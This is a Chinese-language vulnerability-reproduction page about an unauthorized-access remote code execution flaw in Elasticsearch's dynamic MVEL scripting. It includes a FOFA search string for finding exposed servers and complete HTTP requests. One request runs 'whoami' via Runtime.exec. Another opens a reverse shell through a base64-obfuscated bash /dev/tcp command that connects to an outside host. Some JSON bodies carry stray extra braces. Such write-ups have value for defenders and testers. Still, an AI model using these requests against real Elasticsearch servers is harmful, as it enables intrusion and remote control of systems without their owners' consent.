Skip to content

Latest commit

 

History

History
119 lines (98 loc) · 3.65 KB

Elasticsearch存在未授权访问导致的RCE.md

File metadata and controls

119 lines (98 loc) · 3.65 KB

Elasticsearch存在未授权访问导致的RCE

一、漏洞描述

Elasticsearch向使用者提供执行脚本代码的功能,支持mvel, js,groovy,python,和native语言,默认脚本语言为mvel。由于mvel语言功能较为强大,可以直接执行java代码,而且官方默认没有关闭用户可通过http操控这一功能的接口(script.disable_dynamic),从而导致恶意用户可以通过这个功能远程执行任意Java代码。

二、影响版本

Elasticsearch

三、资产测绘

app="Elasticsearch"

1730009233361-9686bf63-9f51-42ac-819e-9bd09b99b929.png

三、漏洞复现

1、利用该漏洞要求Elasticsearch中有数据,所以先创建一条数据

POST /website/blog/ HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

{
    "name": "colleget"
}

1730009268228-6be55838-f010-42a4-af81-58585f9a0c3b.png

2、执行命令

POST /_search?pretty HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 372

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}
    }
}

1730009338548-ecd2b298-f883-4d55-a4f4-f1f9a5899149.png

3、反弹shell

POST /_search?pretty HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 372

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"bash -c {echo,YmFaaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjcwLzc1MzIgMD4mMQ==}|{base64,-d}|{bash,-i}\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}
    }
}

1730009417293-ec63d02a-a5e8-4a7d-b995-fdeec28609ca.png

1730009433078-7c95d622-3e9c-42d4-b0f8-62007c8a37a9.png

更新: 2024-11-27 10:04:43
原文: https://www.yuque.com/xiaokp7/ocvun2/kg7yzqstede6zu7x